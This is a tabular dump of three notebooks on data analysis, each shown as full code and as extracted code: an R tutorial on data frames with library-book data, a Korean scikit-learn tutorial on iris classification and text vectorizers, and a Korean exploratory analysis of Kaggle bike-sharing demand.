code
stringlengths 2.5k
6.36M
| kind
stringclasses 2
values | parsed_code
stringlengths 0
404k
| quality_prob
float64 0
0.98
| learning_prob
float64 0.03
1
|
---|---|---|---|---|
# Starting with Data
**Question**
- What is a data.frame?
- How can I read a complete csv file into R?
- How can I get basic summary information about my dataset?
- How can I change the way R treats strings in my dataset?
- Why would I want strings to be treated differently?
- How are dates represented in R and how can I change the format?
**Objectives**
- Describe what a data frame is.
- Load external data from a .csv file into a data frame.
- Summarize the contents of a data frame.
- Describe the difference between a factor and a string.
- Convert between strings and factors.
- Reorder and rename factors.
- Change how character strings are handled in a data frame.
- Examine and change date formats.
We are going to skip a few steps at the moment. Because we are not in the RStudio environment, things are a little easier, but rest assured the instructions for RStudio are available in a separte notbook in this folder.
R has some base functions for reading a local data file into your R sessionโnamely read.table() and read.csv(), but these have some idiosyncrasies that were improved upon in the readr package, which is installed and loaded with tidyverse.
```
library(tidyverse)
```
To get our sample data into our R session, we will use the read_csv() function and assign it to the books value.
```
books <- read_csv("./data/books.csv")
```
You will see the message Parsed with column specification, followed by each column name and its data type. When you execute read_csv on a data file, it looks through the first 1000 rows of each column and guesses the data type for each column as it reads it into R. For example, in this dataset, it reads SUBJECT as col_character (character), and TOT.CHKOUT as col_double. You have the option to specify the data type for a column manually by using the col_types argument in read_csv.
You should now have an R object called books in the Environment pane: 10000 observations of 12 variables. We will be using this data file in the next module.
> NOTE : read_csv() assumes that fields are delineated by commas, however, in several countries, the comma is used as a decimal separator and the semicolon (;) is used as a field delineator. If you want to read in this type of files in R, you can use the read_csv2 function. It behaves exactly like read_csv but uses different parameters for the decimal and the field separators. If you are working with another format, they can be both specified by the user. Check out the help for read_csv() by typing ?read_csv to learn more. There is also the read_tsv() for tab-separated data files, and read_delim() allows you to specify more details about the structure of your file.
## What are data frames and tibbles?
Data frames are the de facto data structure for tabular data in R, and what we use for data processing, statistics, and plotting.
A data frame is the representation of data in the format of a table where the columns are vectors that all have the same length. Because columns are vectors, each column must contain a single type of data (e.g., characters, integers, factors). For example, here is a figure depicting a data frame comprising a numeric, a character, and a logical vector.
A data frame can be created by hand, but most commonly they are generated by the functions read_csv() or read_table(); in other words, when importing spreadsheets from your hard drive (or the web).
A tibble is an extension of R data frames used by the tidyverse. When the data is read using read_csv(), it is stored in an object of class tbl_df, tbl, and data.frame. You can see the class of an object with class().
## Inspecting data frames
When calling a tbl_df object (like interviews here), there is already a lot of information about our data frame being displayed such as the number of rows, the number of columns, the names of the columns, and as we just saw the class of data stored in each column. However, there are functions to extract this information from data frames. Here is a non-exhaustive list of some of these functions. Letโs try them out!
- Size:
- dim(books) - returns a vector with the number of rows in the first element, and the number of columns as the second element (the dimensions of the object)
- nrow(books) - returns the number of rows
- ncol(books) - returns the number of columns
- Content:
- head(books) - shows the first 6 rows
- tail(books) - shows the last 6 rows
- Names:
- names(books) - returns the column names (synonym of colnames() for data.frame objects)
- Summary:
- View(books) - look at the data in the viewer
- str(books) - structure of the object and information about the class, length and content of each column
- summary(books) - summary statistics for each column
Note: most of these functions are โgenericโ, they can be used on other types of objects besides data frames.
The map() function from purrr is a useful way of running a function on all variables in a data frame or list. If you loaded the tidyverse at the beginning of the session, you also loaded purrr. Here we call class() on books using map_chr(), which will return a character vector of the classes for each variable.
```
map_chr(books, class)
```
## Indexing and subsetting data frames
Our books data frame has 2 dimensions: rows (observations) and columns (variables). If we want to extract some specific data from it, we need to specify the โcoordinatesโ we want from it. In the last session, we used square brackets [ ] to subset values from vectors. Here we will do the same thing for data frames, but we can now add a second dimension. Row numbers come first, followed by column numbers. However, note that different ways of specifying these coordinates lead to results with different classes.
```
## first element in the first column of the data frame (as a vector)
books[1, 1]
## first element in the 6th column (as a vector)
books[1, 6]
## first column of the data frame (as a vector)
books[[1]]
## first column of the data frame (as a data.frame)
books[1]
## first three elements in the 7th column (as a vector)
books[1:3, 7]
## the 3rd row of the data frame (as a data.frame)
books[3, ]
## equivalent to head_books <- head(books)
head_books <- books[1:6, ]
```
## Dollar sign
The dollar sign $ is used to distinguish a specific variable (column, in Excel-speak) in a data frame:
```
head(books$X245.ab) # print the first six book titles
# print the mean number of checkouts
mean(books$TOT.CHKOUT)
```
## unique(), table(), and duplicated()
### unique()
- to see all the distinct values in a variable:
```
unique(books$BCODE2)
```
### table()
- to get quick frequency counts on a variable:
```
table(books$BCODE2) # frequency counts on a variable
```
You can combine table() with relational operators:
```
table(books$TOT.CHKOUT > 50) # how many books have 50 or more checkouts?
```
### duplicated()
- will give you the a logical vector of duplicated values.
```
duplicated(books$ISN) # a TRUE/FALSE vector of duplicated values in the ISN column
!duplicated(books$ISN) # you can put an exclamation mark before it to get non-duplicated values
table(duplicated(books$ISN)) # run a table of duplicated values
which(duplicated(books$ISN)) # get row numbers of duplicated values
```
## Exploring missing values
You may also need to know the number of missing values:
```
sum(is.na(books)) # How many total missing values?
colSums(is.na(books)) # Total missing values per column
table(is.na(books$ISN)) # use table() and is.na() in combination
booksNoNA <- na.omit(books) # Return only observations that have no missing values
```
### Exercise 3.1
1. Call View(books) to examine the data frame. Use the small arrow buttons in the variable name to sort tot_chkout by the highest checkouts. What item has the most checkouts?
2. What is the class of the TOT.CHKOUT variable?
3. Use table() and is.na() to find out how many NA values are in the ISN variable.
4. Call summary(books$ TOT.CHKOUT). What can we infer when we compare the mean, median, and max?
5. hist() will print a rudimentary histogram, which displays frequency counts. Call hist(books$TOT.CHKOUT). What is this telling us?
```
#Exercise 3.1
```
## Logical tests
R contains a number of operators you can use to compare values. Use help(Comparison) to read the R help file. Note that two equal signs (==) are used for evaluating equality (because one equals sign (=) is used for assigning variables).
| Operator | Function |
| :--- | ---: |
| < | Less Than |
| > | Greater Than |
| == | Equal To |
| <= | Less Than or Equal To |
| >= | Greater Than or Equal To |
| != | Not Equal To |
| %ini% | Has a Match In |
| is.na() | Is NA |
| !is.na() | Is Not NA |
Sometimes you need to do multiple logical tests (think Boolean logic). Use help(Logic) to read the help file.
| Operator | Function |
| :--- | ---: |
| & | boolean AND |
| | | boolean OR |
| ! | boolean NOT |
| any() | Are some values true? |
| all() | Are all values true? |
> Key Points
- Use read.csv to read tabular data in R.
- Use factors to represent categorical data in R.
|
github_jupyter
|
library(tidyverse)
books <- read_csv("./data/books.csv")
map_chr(books, class)
## first element in the first column of the data frame (as a vector)
books[1, 1]
## first element in the 6th column (as a vector)
books[1, 6]
## first column of the data frame (as a vector)
books[[1]]
## first column of the data frame (as a data.frame)
books[1]
## first three elements in the 7th column (as a vector)
books[1:3, 7]
## the 3rd row of the data frame (as a data.frame)
books[3, ]
## equivalent to head_books <- head(books)
head_books <- books[1:6, ]
head(books$X245.ab) # print the first six book titles
# print the mean number of checkouts
mean(books$TOT.CHKOUT)
unique(books$BCODE2)
table(books$BCODE2) # frequency counts on a variable
table(books$TOT.CHKOUT > 50) # how many books have 50 or more checkouts?
duplicated(books$ISN) # a TRUE/FALSE vector of duplicated values in the ISN column
!duplicated(books$ISN) # you can put an exclamation mark before it to get non-duplicated values
table(duplicated(books$ISN)) # run a table of duplicated values
which(duplicated(books$ISN)) # get row numbers of duplicated values
sum(is.na(books)) # How many total missing values?
colSums(is.na(books)) # Total missing values per column
table(is.na(books$ISN)) # use table() and is.na() in combination
booksNoNA <- na.omit(books) # Return only observations that have no missing values
#Exercise 3.1
| 0.38943 | 0.994043 |
# 1.2 Sklearn
* ๋ฐ์ดํฐ ๋ถ๋ฌ์ค๊ธฐ
* 2.2.1. ์ธ์ดํท-๋ฐ ๋ฐ์ดํฐ ๋ถ๋ฆฌ
* 2.2.2. ์ธ์ดํท-๋ฐ ์ง๋ ํ์ต
* 2.2.3. ์ธ์ดํท-๋ฐ ๋น์ง๋ ํ์ต
* 2.2.4. ์ธ์ดํท-๋ฐ ํน์ง ์ถ์ถ
```
import sklearn
sklearn.__version__
```
### ๋ฐ์ดํฐ ๋ถ๋ฌ์ค๊ธฐ
```
from sklearn.datasets import load_iris
iris_dataset = load_iris()
print("iris_dataset key: {}".format(iris_dataset.keys()))
print(iris_dataset['data'])
print("shape of data: {}". format(iris_dataset['data'].shape))
print(iris_dataset['feature_names'])
print(iris_dataset['target'])
print(iris_dataset['target_names'])
print(iris_dataset['DESCR'])
```
## 1.2.1. ์ธ์ดํท-๋ฐ ๋ฐ์ดํฐ ๋ถ๋ฆฌ
```
target = iris_dataset['target']
from sklearn.model_selection import train_test_split
train_input, test_input, train_label, test_label = train_test_split(iris_dataset['data'],
target,
test_size = 0.25,
random_state=42)
print("shape of train_input: {}".format(train_input.shape))
print("shape of test_input: {}".format(test_input.shape))
print("shape of train_label: {}".format(train_label.shape))
print("shape of test_label: {}".format(test_label.shape))
```
## 1.2.2. ์ธ์ดํท-๋ฐ ์ง๋ ํ์ต
```
from sklearn.neighbors import KNeighborsClassifier
knn = KNeighborsClassifier(n_neighbors = 1)
knn.fit(train_input, train_label)
import numpy as np
new_input = np.array([[6.1, 2.8, 4.7, 1.2]])
knn.predict(new_input)
predict_label = knn.predict(test_input)
print(predict_label)
print('test accuracy {:.2f}'.format(np.mean(predict_label == test_label)))
```
## 1.2.3. ์ธ์ดํท-๋ฐ ๋น์ง๋ ํ์ต
```
from sklearn.cluster import KMeans
k_means = KMeans(n_clusters=3)
k_means.fit(train_input)
k_means.labels_
print("0 cluster:", train_label[k_means.labels_ == 0])
print("1 cluster:", train_label[k_means.labels_ == 1])
print("2 cluster:", train_label[k_means.labels_ == 2])
import numpy as np
new_input = np.array([[6.1, 2.8, 4.7, 1.2]])
prediction = k_means.predict(new_input)
print(prediction)
predict_cluster = k_means.predict(test_input)
print(predict_cluster)
np_arr = np.array(predict_cluster)
np_arr[np_arr==0], np_arr[np_arr==1], np_arr[np_arr==2] = 3, 4, 5
np_arr[np_arr==3] = 1
np_arr[np_arr==4] = 0
np_arr[np_arr==5] = 2
predict_label = np_arr.tolist()
print(predict_label)
print('test accuracy {:.2f}'.format(np.mean(predict_label == test_label)))
```
## 1.2.4. ์ธ์ดํท-๋ฐ ํน์ง ์ถ์ถ
* CountVectorizer
* TfidfVectorizer
### CountVectorizer
```
from sklearn.feature_extraction.text import CountVectorizer
text_data = ['๋๋ ๋ฐฐ๊ฐ ๊ณ ํ๋ค', '๋ด์ผ ์ ์ฌ ๋ญ๋จน์ง', '๋ด์ผ ๊ณต๋ถ ํด์ผ๊ฒ ๋ค', '์ ์ฌ ๋จน๊ณ ๊ณต๋ถ ํด์ผ์ง']
count_vectorizer = CountVectorizer()
count_vectorizer.fit(text_data)
print(count_vectorizer.vocabulary_)
sentence = [text_data[0]] # ['๋๋ ๋ฐฐ๊ฐ ๊ณ ํ๋ค']
print(count_vectorizer.transform(sentence).toarray())
```
### TfidfVectorizer
```
from sklearn.feature_extraction.text import TfidfVectorizer
text_data = ['๋๋ ๋ฐฐ๊ฐ ๊ณ ํ๋ค', '๋ด์ผ ์ ์ฌ ๋ญ๋จน์ง', '๋ด์ผ ๊ณต๋ถ ํด์ผ๊ฒ ๋ค', '์ ์ฌ ๋จน๊ณ ๊ณต๋ถ ํด์ผ์ง']
tfidf_vectorizer = TfidfVectorizer()
tfidf_vectorizer.fit(text_data)
print(tfidf_vectorizer.vocabulary_)
sentence = [text_data[3]] # ['์ ์ฌ ๋จน๊ณ ๊ณต๋ถ ํด์ผ์ง']
print(tfidf_vectorizer.transform(sentence).toarray())
```
|
github_jupyter
|
import sklearn
sklearn.__version__
from sklearn.datasets import load_iris
iris_dataset = load_iris()
print("iris_dataset key: {}".format(iris_dataset.keys()))
print(iris_dataset['data'])
print("shape of data: {}". format(iris_dataset['data'].shape))
print(iris_dataset['feature_names'])
print(iris_dataset['target'])
print(iris_dataset['target_names'])
print(iris_dataset['DESCR'])
target = iris_dataset['target']
from sklearn.model_selection import train_test_split
train_input, test_input, train_label, test_label = train_test_split(iris_dataset['data'],
target,
test_size = 0.25,
random_state=42)
print("shape of train_input: {}".format(train_input.shape))
print("shape of test_input: {}".format(test_input.shape))
print("shape of train_label: {}".format(train_label.shape))
print("shape of test_label: {}".format(test_label.shape))
from sklearn.neighbors import KNeighborsClassifier
knn = KNeighborsClassifier(n_neighbors = 1)
knn.fit(train_input, train_label)
import numpy as np
new_input = np.array([[6.1, 2.8, 4.7, 1.2]])
knn.predict(new_input)
predict_label = knn.predict(test_input)
print(predict_label)
print('test accuracy {:.2f}'.format(np.mean(predict_label == test_label)))
from sklearn.cluster import KMeans
k_means = KMeans(n_clusters=3)
k_means.fit(train_input)
k_means.labels_
print("0 cluster:", train_label[k_means.labels_ == 0])
print("1 cluster:", train_label[k_means.labels_ == 1])
print("2 cluster:", train_label[k_means.labels_ == 2])
import numpy as np
new_input = np.array([[6.1, 2.8, 4.7, 1.2]])
prediction = k_means.predict(new_input)
print(prediction)
predict_cluster = k_means.predict(test_input)
print(predict_cluster)
np_arr = np.array(predict_cluster)
np_arr[np_arr==0], np_arr[np_arr==1], np_arr[np_arr==2] = 3, 4, 5
np_arr[np_arr==3] = 1
np_arr[np_arr==4] = 0
np_arr[np_arr==5] = 2
predict_label = np_arr.tolist()
print(predict_label)
print('test accuracy {:.2f}'.format(np.mean(predict_label == test_label)))
from sklearn.feature_extraction.text import CountVectorizer
text_data = ['๋๋ ๋ฐฐ๊ฐ ๊ณ ํ๋ค', '๋ด์ผ ์ ์ฌ ๋ญ๋จน์ง', '๋ด์ผ ๊ณต๋ถ ํด์ผ๊ฒ ๋ค', '์ ์ฌ ๋จน๊ณ ๊ณต๋ถ ํด์ผ์ง']
count_vectorizer = CountVectorizer()
count_vectorizer.fit(text_data)
print(count_vectorizer.vocabulary_)
sentence = [text_data[0]] # ['๋๋ ๋ฐฐ๊ฐ ๊ณ ํ๋ค']
print(count_vectorizer.transform(sentence).toarray())
from sklearn.feature_extraction.text import TfidfVectorizer
text_data = ['๋๋ ๋ฐฐ๊ฐ ๊ณ ํ๋ค', '๋ด์ผ ์ ์ฌ ๋ญ๋จน์ง', '๋ด์ผ ๊ณต๋ถ ํด์ผ๊ฒ ๋ค', '์ ์ฌ ๋จน๊ณ ๊ณต๋ถ ํด์ผ์ง']
tfidf_vectorizer = TfidfVectorizer()
tfidf_vectorizer.fit(text_data)
print(tfidf_vectorizer.vocabulary_)
sentence = [text_data[3]] # ['์ ์ฌ ๋จน๊ณ ๊ณต๋ถ ํด์ผ์ง']
print(tfidf_vectorizer.transform(sentence).toarray())
| 0.412885 | 0.962497 |
<a href="https://colab.research.google.com/github/SLCFLAB/Data-Science-Python/blob/main/Day%209/9_1_0_bike_sharing_data.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
๋จธ์ ๋ฌ๋ ๋ฅ๋ฌ๋ ๋ฌธ์ ํด๊ฒฐ์ ๋ต(์ ๋ฐฑ๊ท )
https://www.kaggle.com/code/werooring/ch6-eda/notebook
# ์์ ๊ฑฐ ๋์ฌ ์์ ์์ธก ๊ฒฝ์ง๋ํ ํ์์ ๋ฐ์ดํฐ ๋ถ์
- [์์ ๊ฑฐ ๋์ฌ ์์ ์์ธก ๊ฒฝ์ง๋ํ ๋งํฌ](https://www.kaggle.com/c/bike-sharing-demand)
- [ํ์์ ๋ฐ์ดํฐ ๋ถ์ ์ฝ๋ ์ฐธ๊ณ ๋งํฌ](https://www.kaggle.com/viveksrinivasan/eda-ensemble-model-top-10-percentile)
## 1. ๋ฐ์ดํฐ ๋๋ฌ๋ณด๊ธฐ
```
import numpy as np
import pandas as pd
# ๋ฐ์ดํฐ ๊ฒฝ๋ก
data_path = 'https://raw.githubusercontent.com/SLCFLAB/Data-Science-Python/main/Day%209/data/'
train = pd.read_csv(data_path + 'bike_train.csv')
test = pd.read_csv(data_path + 'bike_test.csv')
submission = pd.read_csv(data_path + 'bike_sampleSubmission.csv')
train.shape, test.shape
train.head()
test.head()
submission.head()
train.info()
test.info()
```
## 2. ๋ ํจ๊ณผ์ ์ธ ๋ถ์์ ์ํ ํผ์ฒ ์์ง๋์ด๋ง
```
print(train['datetime'][100]) # datetime 100๋ฒ์งธ ์์
print(train['datetime'][100].split()) # ๊ณต๋ฐฑ ๊ธฐ์ค์ผ๋ก ๋ฌธ์์ด ๋๋๊ธฐ
print(train['datetime'][100].split()[0]) # ๋ ์ง
print(train['datetime'][100].split()[1]) # ์๊ฐ
print(train['datetime'][100].split()[0]) # ๋ ์ง
print(train['datetime'][100].split()[0].split('-')) # "_" ๊ธฐ์ค์ผ๋ก ๋ฌธ์์ด ๋๋๊ธฐ
print(train['datetime'][100].split()[0].split('-')[0]) # ์ฐ๋
print(train['datetime'][100].split()[0].split('-')[1]) # ์
print(train['datetime'][100].split()[0].split('-')[2]) # ์ผ
print(train['datetime'][100].split()[1]) # ์๊ฐ
print(train['datetime'][100].split()[1].split(':')) # ":" ๊ธฐ์ค์ผ๋ก ๋ฌธ์์ด ๋๋๊ธฐ
print(train['datetime'][100].split()[1].split(':')[0]) # ์๊ฐ
print(train['datetime'][100].split()[1].split(':')[1]) # ๋ถ
print(train['datetime'][100].split()[1].split(':')[2]) # ์ด
train['date'] = train['datetime'].apply(lambda x: x.split()[0]) # ๋ ์ง ํผ์ฒ ์์ฑ
# ์ฐ๋, ์, ์ผ, ์, ๋ถ, ์ด ํผ์ฒ๋ฅผ ์ฐจ๋ก๋ก ์์ฑ
train['year'] = train['datetime'].apply(lambda x: x.split()[0].split('-')[0])
train['month'] = train['datetime'].apply(lambda x: x.split()[0].split('-')[1])
train['day'] = train['datetime'].apply(lambda x: x.split()[0].split('-')[2])
train['hour'] = train['datetime'].apply(lambda x: x.split()[1].split(':')[0])
train['minute'] = train['datetime'].apply(lambda x: x.split()[1].split(':')[1])
train['second'] = train['datetime'].apply(lambda x: x.split()[1].split(':')[2])
from datetime import datetime
import calendar
print(train['date'][100]) # ๋ ์ง
print(datetime.strptime(train['date'][100], '%Y-%m-%d')) # datetime ํ์
์ผ๋ก ๋ณ๊ฒฝ
print(datetime.strptime(train['date'][100], '%Y-%m-%d').weekday()) # ์ ์๋ก ์์ผ ๋ฐํ
print(calendar.day_name[datetime.strptime(train['date'][100], '%Y-%m-%d').weekday()]) # ๋ฌธ์๋ก ์์ผ ๋ฐํ
train['weekday'] = train['date'].apply(
lambda dateString:
calendar.day_name[datetime.strptime(dateString,"%Y-%m-%d").weekday()])
train['weekday']
train['season'] = train['season'].map({1: 'Spring',
2: 'Summer',
3: 'Fall',
4: 'Winter' })
train['weather'] = train['weather'].map({1: 'Clear',
2: 'Mist, Few clouds',
3: 'Light Snow, Rain, Thunder',
4: 'Heavy Snow, Rain, Thunder'})
train.head()
```
## 3. ๋ฐ์ดํฐ ์๊ฐํ
```
import seaborn as sns
import matplotlib as mpl
import matplotlib.pyplot as plt
%matplotlib inline
```
### ๋ถํฌ๋
```
mpl.rc('font', size=15) # ํฐํธ ํฌ๊ธฐ 15๋ก ์ค์
sns.displot(train['count']); # ๋ถํฌ๋ ์ถ๋ ฅ
sns.displot(np.log(train['count']));
```
### ๋ง๋ ๊ทธ๋ํ
```
# ์คํ
1 : mํ n์ด Figure ์ค๋น
mpl.rc('font', size=14) # ํฐํธ ํฌ๊ธฐ ์ค์
mpl.rc('axes', titlesize=15) # ๊ฐ ์ถ์ ์ ๋ชฉ ํฌ๊ธฐ ์ค์
figure, axes = plt.subplots(nrows=3, ncols=2) # 3ํ 2์ด Figure ์์ฑ
plt.tight_layout() # ๊ทธ๋ํ ์ฌ์ด์ ์ฌ๋ฐฑ ํ๋ณด
figure.set_size_inches(10, 9) # ์ ์ฒด Figure ํฌ๊ธฐ๋ฅผ 10x9์ธ์น๋ก ์ค์
# ์คํ
2 : ๊ฐ ์ถ์ ์๋ธํ๋กฏ ํ ๋น
# ๊ฐ ์ถ์ ์ฐ๋, ์, ์ผ, ์๊ฐ, ๋ถ, ์ด๋ณ ํ๊ท ๋์ฌ ์๋ ๋ง๋ ๊ทธ๋ํ ํ ๋น
sns.barplot(x='year', y='count', data=train, ax=axes[0, 0])
sns.barplot(x='month', y='count', data=train, ax=axes[0, 1])
sns.barplot(x='day', y='count', data=train, ax=axes[1, 0])
sns.barplot(x='hour', y='count', data=train, ax=axes[1, 1])
sns.barplot(x='minute', y='count', data=train, ax=axes[2, 0])
sns.barplot(x='second', y='count', data=train, ax=axes[2, 1])
# ์คํ
3 : ์ธ๋ถ ์ค์
# 3-1 : ์๋ธํ๋กฏ์ ์ ๋ชฉ ๋ฌ๊ธฐ
axes[0, 0].set(title='Rental amounts by year')
axes[0, 1].set(title='Rental amounts by month')
axes[1, 0].set(title='Rental amounts by day')
axes[1, 1].set(title='Rental amounts by hour')
axes[2, 0].set(title='Rental amounts by minute')
axes[2, 1].set(title='Rental amounts by second')
# 3-2 : 1ํ์ ์์นํ ์๋ธํ๋กฏ๋ค์ x์ถ ๋ผ๋ฒจ 90๋ ํ์
axes[1, 0].tick_params(axis='x', labelrotation=90)
axes[1, 1].tick_params(axis='x', labelrotation=90)
```
### ๋ฐ์คํ๋กฏ
```
# ์คํ
1 : mํ n์ด Figure ์ค๋น
figure, axes = plt.subplots(nrows=2, ncols=2) # 2ํ 2์ด
plt.tight_layout()
figure.set_size_inches(10, 10)
# ์คํ
2 : ์๋ธํ๋กฏ ํ ๋น
# ๊ณ์ , ๋ ์จ, ๊ณตํด์ผ, ๊ทผ๋ฌด์ผ๋ณ ๋์ฌ ์๋ ๋ฐ์คํ๋กฏ
sns.boxplot(x='season', y='count', data=train, ax=axes[0, 0])
sns.boxplot(x='weather', y='count', data=train, ax=axes[0, 1])
sns.boxplot(x='holiday', y='count', data=train, ax=axes[1, 0])
sns.boxplot(x='workingday', y='count', data=train, ax=axes[1, 1])
# ์คํ
3 : ์ธ๋ถ ์ค์
# 3-1 : ์๋ธํ๋กฏ์ ์ ๋ชฉ ๋ฌ๊ธฐ
axes[0, 0].set(title='Box Plot On Count Across Season')
axes[0, 1].set(title='Box Plot On Count Across Weather')
axes[1, 0].set(title='Box Plot On Count Across Holiday')
axes[1, 1].set(title='Box Plot On Count Across Working Day')
# 3-2 : x์ถ ๋ผ๋ฒจ ๊ฒน์นจ ํด๊ฒฐ
axes[0, 1].tick_params('x', labelrotation=10) # 10๋ ํ์
```
### ํฌ์ธํธํ๋กฏ
```
# ์คํ
1 : mํ n์ด Figure ์ค๋น
mpl.rc('font', size=11)
figure, axes = plt.subplots(nrows=5) # 5ํ 1์ด
figure.set_size_inches(12, 18)
# ์คํ
2 : ์๋ธํ๋กฏ ํ ๋น
# ๊ทผ๋ฌด์ผ, ๊ณตํด์ผ, ์์ผ, ๊ณ์ , ๋ ์จ์ ๋ฐ๋ฅธ ์๊ฐ๋๋ณ ํ๊ท ๋์ฌ ์๋ ํฌ์ธํธํ๋กฏ
sns.pointplot(x='hour', y='count', data=train, hue='workingday', ax=axes[0])
sns.pointplot(x='hour', y='count', data=train, hue='holiday', ax=axes[1])
sns.pointplot(x='hour', y='count', data=train, hue='weekday', ax=axes[2])
sns.pointplot(x='hour', y='count', data=train, hue='season', ax=axes[3])
sns.pointplot(x='hour', y='count', data=train, hue='weather', ax=axes[4]);
```
### ํ๊ท์ ์ ํฌํจํ ์ฐ์ ๋ ๊ทธ๋ํ
```
# ์คํ
1 : mํ n์ด Figure ์ค๋น
mpl.rc('font', size=15)
figure, axes = plt.subplots(nrows=2, ncols=2) # 2ํ 2์ด
plt.tight_layout()
figure.set_size_inches(7, 6)
# ์คํ
2 : ์๋ธํ๋กฏ ํ ๋น
# ์จ๋, ์ฒด๊ฐ ์จ๋, ํ์, ์ต๋ ๋ณ ๋์ฌ ์๋ ์ฐ์ ๋ ๊ทธ๋ํ
sns.regplot(x='temp', y='count', data=train, ax=axes[0, 0],
scatter_kws={'alpha': 0.2}, line_kws={'color': 'blue'})
sns.regplot(x='atemp', y='count', data=train, ax=axes[0, 1],
scatter_kws={'alpha': 0.2}, line_kws={'color': 'blue'})
sns.regplot(x='windspeed', y='count', data=train, ax=axes[1, 0],
scatter_kws={'alpha': 0.2}, line_kws={'color': 'blue'})
sns.regplot(x='humidity', y='count', data=train, ax=axes[1, 1],
scatter_kws={'alpha': 0.2}, line_kws={'color': 'blue'});
```
### ํํธ๋งต
```
train[['temp', 'atemp', 'humidity', 'windspeed', 'count']].corr()
# ํผ์ฒ ๊ฐ ์๊ด๊ด๊ณ ๋งคํธ๋ฆญ์ค
corrMat = train[['temp', 'atemp', 'humidity', 'windspeed', 'count']].corr()
fig, ax= plt.subplots()
fig.set_size_inches(10, 10)
sns.heatmap(corrMat, annot=True) # ์๊ด๊ด๊ณ ํํธ๋งต ๊ทธ๋ฆฌ๊ธฐ
ax.set(title='Heatmap of Numerical Data');
```
|
github_jupyter
|
import numpy as np
import pandas as pd
# ๋ฐ์ดํฐ ๊ฒฝ๋ก
data_path = 'https://raw.githubusercontent.com/SLCFLAB/Data-Science-Python/main/Day%209/data/'
train = pd.read_csv(data_path + 'bike_train.csv')
test = pd.read_csv(data_path + 'bike_test.csv')
submission = pd.read_csv(data_path + 'bike_sampleSubmission.csv')
train.shape, test.shape
train.head()
test.head()
submission.head()
train.info()
test.info()
print(train['datetime'][100]) # datetime 100๋ฒ์งธ ์์
print(train['datetime'][100].split()) # ๊ณต๋ฐฑ ๊ธฐ์ค์ผ๋ก ๋ฌธ์์ด ๋๋๊ธฐ
print(train['datetime'][100].split()[0]) # ๋ ์ง
print(train['datetime'][100].split()[1]) # ์๊ฐ
print(train['datetime'][100].split()[0]) # ๋ ์ง
print(train['datetime'][100].split()[0].split('-')) # "_" ๊ธฐ์ค์ผ๋ก ๋ฌธ์์ด ๋๋๊ธฐ
print(train['datetime'][100].split()[0].split('-')[0]) # ์ฐ๋
print(train['datetime'][100].split()[0].split('-')[1]) # ์
print(train['datetime'][100].split()[0].split('-')[2]) # ์ผ
print(train['datetime'][100].split()[1]) # ์๊ฐ
print(train['datetime'][100].split()[1].split(':')) # ":" ๊ธฐ์ค์ผ๋ก ๋ฌธ์์ด ๋๋๊ธฐ
print(train['datetime'][100].split()[1].split(':')[0]) # ์๊ฐ
print(train['datetime'][100].split()[1].split(':')[1]) # ๋ถ
print(train['datetime'][100].split()[1].split(':')[2]) # ์ด
train['date'] = train['datetime'].apply(lambda x: x.split()[0]) # ๋ ์ง ํผ์ฒ ์์ฑ
# ์ฐ๋, ์, ์ผ, ์, ๋ถ, ์ด ํผ์ฒ๋ฅผ ์ฐจ๋ก๋ก ์์ฑ
train['year'] = train['datetime'].apply(lambda x: x.split()[0].split('-')[0])
train['month'] = train['datetime'].apply(lambda x: x.split()[0].split('-')[1])
train['day'] = train['datetime'].apply(lambda x: x.split()[0].split('-')[2])
train['hour'] = train['datetime'].apply(lambda x: x.split()[1].split(':')[0])
train['minute'] = train['datetime'].apply(lambda x: x.split()[1].split(':')[1])
train['second'] = train['datetime'].apply(lambda x: x.split()[1].split(':')[2])
from datetime import datetime
import calendar
print(train['date'][100]) # ๋ ์ง
print(datetime.strptime(train['date'][100], '%Y-%m-%d')) # datetime ํ์
์ผ๋ก ๋ณ๊ฒฝ
print(datetime.strptime(train['date'][100], '%Y-%m-%d').weekday()) # ์ ์๋ก ์์ผ ๋ฐํ
print(calendar.day_name[datetime.strptime(train['date'][100], '%Y-%m-%d').weekday()]) # ๋ฌธ์๋ก ์์ผ ๋ฐํ
train['weekday'] = train['date'].apply(
lambda dateString:
calendar.day_name[datetime.strptime(dateString,"%Y-%m-%d").weekday()])
train['weekday']
train['season'] = train['season'].map({1: 'Spring',
2: 'Summer',
3: 'Fall',
4: 'Winter' })
train['weather'] = train['weather'].map({1: 'Clear',
2: 'Mist, Few clouds',
3: 'Light Snow, Rain, Thunder',
4: 'Heavy Snow, Rain, Thunder'})
train.head()
import seaborn as sns
import matplotlib as mpl
import matplotlib.pyplot as plt
%matplotlib inline
mpl.rc('font', size=15) # ํฐํธ ํฌ๊ธฐ 15๋ก ์ค์
sns.displot(train['count']); # ๋ถํฌ๋ ์ถ๋ ฅ
sns.displot(np.log(train['count']));
# ์คํ
1 : mํ n์ด Figure ์ค๋น
mpl.rc('font', size=14) # ํฐํธ ํฌ๊ธฐ ์ค์
mpl.rc('axes', titlesize=15) # ๊ฐ ์ถ์ ์ ๋ชฉ ํฌ๊ธฐ ์ค์
figure, axes = plt.subplots(nrows=3, ncols=2) # 3ํ 2์ด Figure ์์ฑ
plt.tight_layout() # ๊ทธ๋ํ ์ฌ์ด์ ์ฌ๋ฐฑ ํ๋ณด
figure.set_size_inches(10, 9) # ์ ์ฒด Figure ํฌ๊ธฐ๋ฅผ 10x9์ธ์น๋ก ์ค์
# ์คํ
2 : ๊ฐ ์ถ์ ์๋ธํ๋กฏ ํ ๋น
# ๊ฐ ์ถ์ ์ฐ๋, ์, ์ผ, ์๊ฐ, ๋ถ, ์ด๋ณ ํ๊ท ๋์ฌ ์๋ ๋ง๋ ๊ทธ๋ํ ํ ๋น
sns.barplot(x='year', y='count', data=train, ax=axes[0, 0])
sns.barplot(x='month', y='count', data=train, ax=axes[0, 1])
sns.barplot(x='day', y='count', data=train, ax=axes[1, 0])
sns.barplot(x='hour', y='count', data=train, ax=axes[1, 1])
sns.barplot(x='minute', y='count', data=train, ax=axes[2, 0])
sns.barplot(x='second', y='count', data=train, ax=axes[2, 1])
# ์คํ
3 : ์ธ๋ถ ์ค์
# 3-1 : ์๋ธํ๋กฏ์ ์ ๋ชฉ ๋ฌ๊ธฐ
axes[0, 0].set(title='Rental amounts by year')
axes[0, 1].set(title='Rental amounts by month')
axes[1, 0].set(title='Rental amounts by day')
axes[1, 1].set(title='Rental amounts by hour')
axes[2, 0].set(title='Rental amounts by minute')
axes[2, 1].set(title='Rental amounts by second')
